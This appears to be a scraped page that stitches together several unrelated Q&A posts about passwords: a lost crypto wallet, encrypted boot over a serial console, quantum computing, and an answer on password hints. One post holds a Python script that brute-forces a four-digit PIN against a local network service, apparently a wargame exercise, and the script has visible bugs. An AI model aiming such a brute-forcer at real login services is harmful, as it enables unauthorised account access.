I have what I believe are my address and password – don’t know what wallet from 2017

I have what appears to be a GUID and a password. But no recollection what service I used of if I even purchased / transferred or made a transaction with them back in 2017. Any way to check to see if I have anything in here and retrieve it? My current BTC is on a platform I use regularly, this was prior to me setting up my current process last year… Any advice?

python – Divide and Conquer Password Bruteforcer

My program brute-forces a password. The password is a string composed of a key and a four digit numeric code. The key is known so we are basically brute-forcing between 0000 through to 9999

An example password is:
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 4143

I updated that script I wrote to take advantage of multiprocessing in order to run faster.
The basic idea is to divide the task by the number of CPUs available.
There are two Events set up:

  • prnt_sig_found is used by subprocesses to tell the parent if they succeed in guessing the right password.
  • The parent process then uses child_sig_term to halt each subprocesses

My Python’s rusty and I think I made some bad choices. It would be useful to have my assumptions invalidated. 🙂

#!/usr/bin/env python
# coding: utf-8

import multiprocessing as mp
import socket
import time
import math
import sys
import os

class Connection:
  def __init__(self, pin = 0, max_iter = 10000, sock = None):
    print('initizializing socket instance ...')

    self.pin = pin
    self.max_iter = max_iter

    self.password = 'UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ'
    self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

  def p_name(self):
    return mp.current_process().name

  def connect(self, host='127.0.0.1', port=30002):
    print(self.p_name(), 'connecting ...', host, port)
    self.sock.connect((host, port))
    print(self.p_name(), 'connection successful.')

  def write(self, msg):
    print(self.p_name(), 'sending', msg) 
    self.sock.sendall(msg)

  def read(self):
      print(self.p_name(), 'reading data ...')
      data = self.sock.recv(4096)
      return data

  def close(self):
    try:
      self.sock.shutdown(0)
      self.sock.close()
    except:
      pass

  def execute(self, child_sig_term, prnt_sig_found):
    start_time = time.time()
    print(self.p_name(), 'executing ...')

    self.connect()

    self.write('greetings !')
    welcome_str = self.read()
    print(welcome_str)

    while self.pin < self.max_iter:
      if child_sig_term.is_set():
        break

      pin_str = str(self.pin).zfill(4)
      message = self.password + " " + pin_str + "n" # add newline char to flush message or it doesn't get sent

      self.write(message.encode())
      received_msg = self.read()

      if 'Wrong' in received_msg:
        print(self.p_name(), 'Wrong guess %s', pin_str)
      else:
        print('_________________found_____________', received_msg)
        prnt_sig_found.set()
        break

      self.pin += 1
      time.sleep(0.5)

    end_time = time.time()
    total_time = end_time - start_time
    print(self.p_name(), "start: "+str(self.pin), ' end: '+str(self.max_iter), 'total_time: ', str((total_time)/60) + ' minutes')


def main():
  print('main')

  connections = ()
  processes = ()

  # requires read/write access to /dev/shm
  prnt_sig_found = mp.Event()
  child_sig_term = mp.Event()

  MAX_ITER_COUNT = 10000
  processor_count = mp.cpu_count()

  step_count = int(math.floor(MAX_ITER_COUNT / processor_count)) # math.floor returns a float in python 2
  end = step_count
  start = 0

  print('Initial values ->', processor_count, step_count, start, end)

  try:
    for i in range(processor_count):
      conn = Connection(pin = start, max_iter = end)
      proc_name = 'BF( ' + str(start) + ' - ' + str(end) + ' )'

      process = mp.Process(name=proc_name, target=conn.execute, args=(child_sig_term, prnt_sig_found))
      process.daemon = True

      connections.append(conn)
      processes.append(process)

      start = end + 1
      end += start + step_count

      # ensure start and end don't exceed max
      if MAX_ITER_COUNT < end  : end = MAX_ITER_COUNT
      if MAX_ITER_COUNT < start: start = MAX_ITER_COUNT

    # start all processes
    for process in processes:
      process.start()

    # wait for all processes to finish
    # block the main program until these processes are finished
    for process in processes:
      process.join()

    prnt_sig_found.wait()
    child_sig_term.set()

  except:
    pass

  finally:
    for conn in connections:
      conn.close()

    for process in processes:
      if process.is_alive():
        process.terminate()
        
      
if __name__ == '__main__':
  main()

encryption – Encrypting a password with its own hash

I just found out that an e-commerce platform (similar to Shopify) I was planning on using allows me to see my password. I know I can’t assume anything and I should (probably) just run away from it, but it got me curious: is there a way to do it securely?

I mean, what if they use the password’s hash as an encryption key to encrypt the password itself? If done properly, could something like this be a reasonable solution?

Moreover, does anyone have any idea why on earth an e-commerce platform would choose to do it?

And no, I don’t plan to implement anything like this.

registration – How to tell the user email already exists and if that email address belongs to you then reset the password

I need to show a message to the user if the user tries to create an account and that email address already is taken and if that email address belongs to the user then reset the password for the account associated with that email address.

There might be some case this could happen.

  • User creates an account before and forgot that
  • Someone has uses there an email address to create an account

terminal – Catalina Error: Reset Password Failed Error

The Reset Password Failed Error failed from the perspective of an alternate Admin User. I also tried it from Recovery Mode where the user didn’t appear. In Single User Mode using the ls command, the user does appear. When attempting the reset from Single User Mode after using mount -uw / then launchctl load /System/Library/LaunchDaemons/com.apple.opendirectoryd.plist then passwd username, it offers the reset, but when attempting, it gives the error that the password is too short when it clearly isn’t too short. How can I recover this user? I’ve also reset user permissions to no avail.

server – Need TTY Console mode to be able to enter LUKS password at boot (Ubuntu 18.04)

I have a (supposed to be) headless server running Ubuntu 18.04 where the boot volume is LUKS encrypted. I am unable to redirect the initial boot process to the serial console (running Putty from a Windows 10 PC) so that I can enter the password. At this point the only option I have to leave the enclosure open with a video card and usb keyboard installed so I can enter the password–not a workable option.

The serial console port (from the W10 PC) sees the initial GRUB menu up to the “Press ESC for options”, but nothing until I enter the password. After I enter the password, the remainder of the boot process output appears on the serial console port and I can login. Initially I couldn’t even get the output after the password and the console login to work. To get that far I did the following:

  1. Edit /etc/default/grub file so that GRUB_CMDLINE_LINUX reads “console=tty1 console=ttyS5,115200”
  2. Update GRUB with sudo update-grub
  3. sudo systemctl start getty@ttyS5
  4. sudo systemctl enable getty@ttyS5

I need to get the entire boot sequence, including prompt for LUKS password redirected to the serial console port. I’ve tried so many different procedures I can’t possibly put them all down, including a half dozen from this site. Someone please help, I need to be able to seal up the enclosure, with the video card and USB keyboard removed and all interaction with the boot process managed from the serial console port.

Many thanksto the Ubuntu Community in advance

password cracking – Doesn’t Hashing Negate Quantum Computer Factoring?

I’ve read/watched a lot about Quantum Computers, trying to really get into the physics of it. Seems like the topic is poorly explained. I do understand that it takes a lot of qbits to beat modern encryption, so there’s no concern for a while longer.

So while I do see lots of articles/videos claiming Shor’s algorithm will defeat encryption, nothing has explained how the key is captured, and/or how the hashing/salting of the key is undone such that the algorithm has a proper number to work with. Seems like those are pretty big hurdles to overcome regardless of the algorithm.

usability – Designing password entry to provide hints

This probably wouldn’t be a great idea.

It would be easier to hack

If you did this at the start/middle/end of the word, it would take barely any time to brute-force the account. Basically, that means that the hacker could systematically use dictionary words until they found the correct one.

It’s hard to implement

Also, your login form should be focused and simple and neat, and shouldn’t have all sorts of weird features like this.

Users probably won’t like it

Users are used to forgetting passwords, and they might be a bit confused/shocked/angry/scared if, on the forgot password page, it said the first letters of their password in large letters.

Users are also used to getting reset emails and immediately going to their inbox after pressing the reset button. If they were just faced with two letters and still couldn’t know what it was, then they wouldn’t be able to get in.

Example

Let’s look at this from a user’s point of view.

  1. You setup an account
  2. You want it to be very secure (of course)
  3. You’ve forgotten your password
  4. You can’t remember it at all
  5. You do a password reset
  6. It then shows you the first and last letter of your password in large pink and purple letters
  7. You can remember your password now! Hurrah!

Now, let’s look at this from a hacker’s point of view.

  1. You find out about this website
  2. You see that the password reset shows you the first and last letter of your password in large pink and purple letters
  3. You then put the user’s account username into the password reset
  4. Then, the letters are revealed
  5. You then get a robot to try out all the dictionary words starting with those letters
  6. You have then got access to the user’s login details.

Now then, this would not be good. No it wouldn’t.